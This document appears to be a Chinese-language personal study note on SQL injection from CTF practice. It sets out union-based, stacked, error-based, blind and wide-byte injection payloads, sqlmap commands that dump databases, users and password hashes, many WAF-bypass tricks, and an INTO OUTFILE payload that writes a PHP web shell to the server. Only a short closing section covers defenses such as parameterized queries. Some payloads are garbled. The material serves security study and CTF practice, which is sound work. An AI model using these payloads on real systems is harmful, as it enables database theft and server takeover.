SQL注入
笔记放在本地总是容易搞丢,备份一下
sql注入
http://127.0.0.1/sqlilabs/Less-2/?id=1
http://127.0.0.1/sqlilabs/Less-2/?id=3 -- -
http://127.0.0.1/sqlilabs/Less-2/?id=3' -- -
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=1 -- -
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=2 -- -
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=1 order by 1,2,3-- -
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=1 union select 1,2,3-- -
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=-1 union select 1,2,3-- -
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=-1 union select 1,version(),database()-- - 爆出版本和数据库名
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=-1 union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database()-- - 爆出版本和当前数据库表名
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=-1 union select 1,version(),group_concat(column_name) from information_schema.columns where table_schema=database()-- - 爆出版本和数据库表的字段
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=-1 union select 1,version(),group_concat(column_name) from information_schema.columns where table_name='users'-- - 爆出版本和数据库表users的字段
http://127.0.0.1/sqlilabs/Less-2/?id=3' and 1=-1 union select 1,version(),group_concat(id,0x23,username,0x23,password) from users-- -
爆出版本和当前表的内容
盲注:构造payload通过python脚本来实现(直接sqlmap跑也可以)
延时注入:
布尔盲注;
堆叠注入:id=1'; 闭合之后在冒号后面执行数据库语句。
RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;#
这里还有一种新姿势,参考官方文档
HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关闭
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;#
(flaghere是flag所在的表名)
BUUCTF 随便注;
http://c6752d56-5667-44fe-b04b-ddfd0a1eea8d.node4.buuoj.cn:81/?inject=1';rename tables words to words1;rename tables`1919810931114514` to words;alter table words change flag id varchar(100);-- -(字符串为表名操作时要加反引号)
二次注入:先注册一个admin'# 登录进去之后重置密码为000之后在登录admin账号
sqlmap用法
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' # 检测注入点是否可用
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --dbs #可曝出该mysql中所有数据库名称
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --current-db #web当前使用的数据库
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --current-user #web数据库使用账户
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --users #列出sql所有用户
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' --passwords #数据库账户与密码
sqlmap -u ‘192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1’ --tables #输出所有的表
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' -D 【数据库名】 --tables #-D 指定数据库名
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' -D 【数据库名】 -T 【表名】 --columns #-T:指定要列出字段的表 --columns 列出了所有的列字段
sqlmap -u '192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1' -D 【数据库名】 -T 【表名】 -C"username,realname,password" --dump # -C :指定要爆的字段
sqlmap万能用法
burp抓包保存为1.txt 抓到的包右键保存成一个.txt文件,然后输入python sqlmap.py -r之后直接把那个txt文件拖到命令里面,不用在找文件路径了,如果是时间盲注可能要跑1小时,耐心等待
sqlmap -r 1.txt --dbs #可曝出该mysql中所有数据库名称
sqlmap -r 1.txt --current-db #web当前使用的数据库
--users 查询数据库用户
--privileges 查询用户权限
--threads=NUM 设置线程数,可以根据自己电脑的性能和网络状态在NUM处指定数字,在bool盲注的时候可以提高速度。
将sqlmap的参数设置为level=2,这样sqlmap就会自动检测Cookie中是否存在注入了。
将sqlmap的参数设置为level=3,这样sqlmap会自动检测User-Agent是否存在注入点了。
sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms=mysql --level=3
X-Forwarded-For:127.0.0.1 XFF欺骗(例:本地127.0.0.1那个例子)
Client-ip:
Referer: 从哪里来
client-ip:127.0.0.1也可以
2: SSTI注入。payload例子:client-ip:{system(‘ls’)} X-Forwarded-For:{system(‘ls’)}
SQL读写文件
以MySQL数据库为例,在MySQL用户具有File权限的情况下,可以使用load_file和into outfile/dumpfile进行读写。
写文件的payload如下:
?id=-1+union+select+'<?php eval_(POST[cmd];?>)'+into+outfile '/var/www/html/shell.php'
或者:
?id=-1+union+select+unhex(一句话木马的十六进制)+into+dumpfile '/var/www/html/shell.php'
sql注入绕WAF方法
绕过空格:
(1) #,-- // /* */ ;%00
(2)还可以通过二次url编码来绕过空格,我们知道空格的编码是%20。可以通过二次URL编码来绕过,%20二次url编码就是%2520。
(3)通过空白字符绕过,下面列举数据库中一些常见的可以用来绕过空格过滤的空白字符(十六进制)
SQLite3 : 0A,0D,0C,09,20
MYSQL5; 09,0A,0B,0C,0D,A0,20
PosgresSQL; 0A,0D,0C,09,20
Oracle 11g; 00,0A,0D,0C,09,20
MYSSQL; 01,02,03,04,05,06,07,08,09,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
(4)通过特殊符号(如反引号,加号等),利用反引号绕过空格的语句如下;
select`user`,`password`from...
(5)科学计数法绕过空格
语句如下:SELECT user,password from users where user_id=0e1union select 1,2
1. 大小写绕过
2. 简单编码绕过
-
注释绕过:
如?id=1 uni//on sele//ct 1,2,3 #
\4. 分隔重写绕过:
适用于WAF采用正则表达式检测所有的敏感字的情况,可以通过注释分开敏感字,如?id=1 un//ion sel//ect 1,2,3 #;至于重写绕过,适用于WAF过滤了一次的情况,如uniunionon,有时候可能还有多次过滤的情况,这时多次尝试也可以。
\5. HTTP参数污染(HPP):
如?id=1 union select 1,2,3 from users where id=1 #
这时可以改为?id=1 union select 1&id=2,3 from users where id=1 #
次数&id=会在查询时变成逗号,具体细节取决于 WAF ;
这个例子也同理:?id=1//union/&id=/select/&id=/pwd/&id=/from/&id=/users #
如果服务器代码为: select * from table where a=”.GET[‘a′].”and**b=”.
_GET[‘b’].” limit “.$_GET[‘c’]; 那么可以构造这样的注入语句: ?a=1 union/&b=/select 1,pass/&c=/from users # 最终解析为: select from table where a=1 union/ and b=/select 1,pass/limit */from users # 可以看到,这种方式比较适合白盒测试。
\6. 使用逻辑运算符 or /and 绕过:
如?id=1 or 0x50=0x50
?id=1 and ascii(lower(mid((select pwd from users limit 1,1),1,1)))=74,其中select pwd from users limit 1,1是从 users 表里查询 pwd 字段的第一条记录, 然后 mid()就是取该记录的第一个字符, lower()把字符转换为小写, ascii 把 该字符转换成 ascii 码,最后判断等不等于 74。
\7. 比较操作符替换:比较操作符如!=、<>、<、>都可以用来替换=来绕过。
\8. 同功能函数替换:
substring()可以用mid()、substr()这些函数来替换,都是用来取字符串的某一位字符的;
ascii()编码可以用 hex()、bin(),即十六进制和二进制编码替换;
在使用在基于延时的盲注中benchmark()和sleep()可以相互替换;benchmark函数:该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。使用方法: select BENCHMARK(10000000,MD5(password));
group_concat 、 concat 、concat_ws 三者可以互相替换;
还有一种新的方法 ,3条语句分别如下
substring((select ‘password’),1,1) = 0x70
substr((select ‘password’),1,1) = 0x70
mid((select ‘password’),1,1) = 0x70
都是从 password 里判断第一个字符的值,可以用 strcmp(字符串比较函数)
strcmp(left(‘password’,1), 0x69) = 1
strcmp(left(‘password’,1), 0x70) = 0
strcmp(left(‘password’,1), 0x71) = -1
替换,left 用来取字符串左起 1 位的值,strcmp 用来比较两个值,如果比较结果相等就为 0,左边小的话就为-1,否则为 1。
\9. 盲注无需or和and:
例句:index.PHP?id=1
当and和or被过滤时,可以将 1修改为是通过语句生成的, index.php?uid=strcmp(left((select+hash+from+users+limit+0,1),1),0x42)+123,123 的时候页面是正确的,现在再盲猜 hash 的第一位,如果第一位等于 0x42 也就是 B,那么strcmp结果为0,0+123=123,所以页面应该是正确的。否则就说明不是 B,就这样猜,不用 and 和 or 了。
\10. 加括号:
如?id=(1)union(select(1),mid(hash,1,32)from(users))
?id=(1)union(((((((select(1),hex(hash)from(users))))))))
?id=(1)or(0x50=0x50)
11.缓冲区溢出绕过:
如id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10 #
其中 A 越多越好,一般要求 1000 个以上。
二、检测方法:
1、基于报错的检测方法:
使用各种符号以及组合: ‘ “ ( %
如直接在URL后添加单引号看是否报错index.php?id=1’
2、基于布尔的检测:
最常用的如1’ and ‘1’=’1和1’ and ‘1’=’2 相当于 1’ and ‘1和1’ and ‘0
当返回的结果不同时即有漏洞
3、直接在URL地址后面加-1、-0、’%2B’和’%2B’a:
添加-1:index.php?id=123-1,当前后访问的页面不同时,即可确定存在数字型SQL注入漏洞;
添加-0:index.php?id=123-0,当前后访问的页面相同时,再加上-1,返回错误页面,则表示存在数字型SQL注入漏洞;
添加’%2B’和’%2B’a:这里%2B为‘+’的URL编码,当先添加’%2B’时index.php?id=123’%2B’返回同样的页面,而添加’%2B’a时返回错误,这种适用于SQL语句中id值被一对单引号括起来的情况。
4、判断盲注的常用方法:
1’ and 1=1 #
1’ and 1=2 #
判断这两种不同的输入是否有不一样的显示,如果一个正常一个通用的错误提示或者啥也不显示,则几乎可以确定是含有SQL注入漏洞的。
三、防御方法:
关键是对所有用户的输入进行严格的检查过滤、对数据库配置使用最小权限原则。
常用的修复方案:
(1)所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到 SQL 语句中。
(2)过滤危险的 SQL 语句关键字。
(3)确认每种数据的类型。
(4)数据长度应该严格规定。
(5)网站每个数据层的编码统一。
(6)严格限制网站用户的数据库的操作权限。
(7)避免网站显示 SQL 错误信息。
(8)在网站发布之前建议使用一些专业的 SQL 注入检测工具进行检测。
(9)升级 web 服务器运行平台软件补丁,建议使用 WAF 防护。
其实最有效的防御手段是下面两种:
1、预编译:
原理是采用PreparedStatement将相应的SQL语句预先编译好,即SQL引擎会预先进行语法分析,产生语法树,生成执行计划,从而无论用户输入什么内容即使是sql命令都不会影响该SQL语句的语法结构而只能当成是字符串字面值参数。但并不是所有场景都能采用SQL预编译的,如需要进行一些字符串拼接的方式,这时便需要严格检查参数的数据类型以及采用一些安全函数来处理。
其过程如下:
(1)定义预编译的sql语句,其中待填入的参数用?占位。
(2)创建预编译Statement,并把sql语句传入。此时sql语句已与此preparedStatement绑定。所以第4步执行语句时无需再把sql语句作为参数传入execute()。
(3)填入具体参数。通过setXX(问号下标,数值)来为sql语句填入具体数据。问号下标从1开始,setXX与数值类型有关,字符串就是setString(index,str)。
(4)执行预处理对象。
例子:
String sql=”select id,no from user where id=?”;
PreparedStatement ps = conn.prepareStatement(sql);
prestmt.setInt(1,id);
prestmt.executeQuery();
2、变量绑定:
是指在sql语句的条件中使用变量而不是常量,是为了减少解析的。具体的细节网上很多,后面再补充。
sql注入过程中数据库读取指定的文件(load_file函数)
select *from article where id=('1')/**/union/**/select/**/1,2,load_file("tmp/360/key"),4#)
万能密码:
用?id=1' and '1 来绕过注释符
or and xor not 过滤绕过
and = && or = || xor = | # not = !
;%00来绕过#
二次注入,先登录admin'#,在重置
%23来代替#绕过
=号过滤绕过
如果()都被过滤了,试着用联合查询添加临时账户来实现注入,'union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b' -- - [GXYCTF2019]BabySQli 1的md5加密后的一串数字,这时候联合查询会临时添加一个admin的账户,然后在password这一栏输入1就可以登录进去了。
=号和不加通配符的 like 是一样的 还可以使用 < >号来绕过 =3相当于>2 <4
<> 在mysql中等于!= 如果在加一个! 双重否定代表肯定 就是= 了 例:select *from dog where !(id <>4);
引号绕过(使用十六进制):
会使用到引号的地方一般是在最后的where子句中。如下面的一条sql语句,这条语句就是一个简单的用来查选得到users表中所有字段的一条语句:
select column_name from information_schema.tables where table_name="users"
这个时候如果引号被过滤了,那么上面的where子句就无法使用了。那么遇到这样的问题就要使用十六进制来处理这个问题了。
users的十六进制的字符串是7573657273。那么最后的sql语句就变为了:
select column_name from information_schema.tables where table_name=0x7573657273
报错注入;
方法一 利用 extractvalue(还有函数updataxml)
爆数据库
'or(extractvalue(1,concat(0x7e,(select(database())))))or' (该题过滤掉了空格,所以用or'闭合)
爆表
'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')))))or'
爆字段
'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))or'
爆flag值
'or(extractvalue(1,concat(0x7e,(select(group_concat(username,password))from(H4rDsq1)))))or'
flag{ff8c926c-6054-4a4d-900d-a94f97155f7a}
宽字节注入
GBK 占用两字节
ASCII占用一字节
PHP中编码为GBK,函数执行添加的是ASCII编码(添加的符号为“\”),MYSQL默认字符集是GBK等宽字节字符集。
大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ =%df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MySQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。
宽字节注入,进行列数测试,得知一共有两列,且1,2处都有回显:
http://103.238.227.13:10083/index.php?id=%df%27 union select 1,2%23
获取当前数据库名:
http://103.238.227.13:10083/index.php?id=%df%27 union select database(),2%23
爆表
id=%df%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23
爆列名
id=%df%27 union select 1,group_concat(column_name)from information_schema.columns where table_name=ctf4%23
爆字段
id=%df%27 union select 1,group_concat(flag) from ctf4%23
用sqlmap跑宽字节注入的时候要先加%df,如sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=�' --current-db
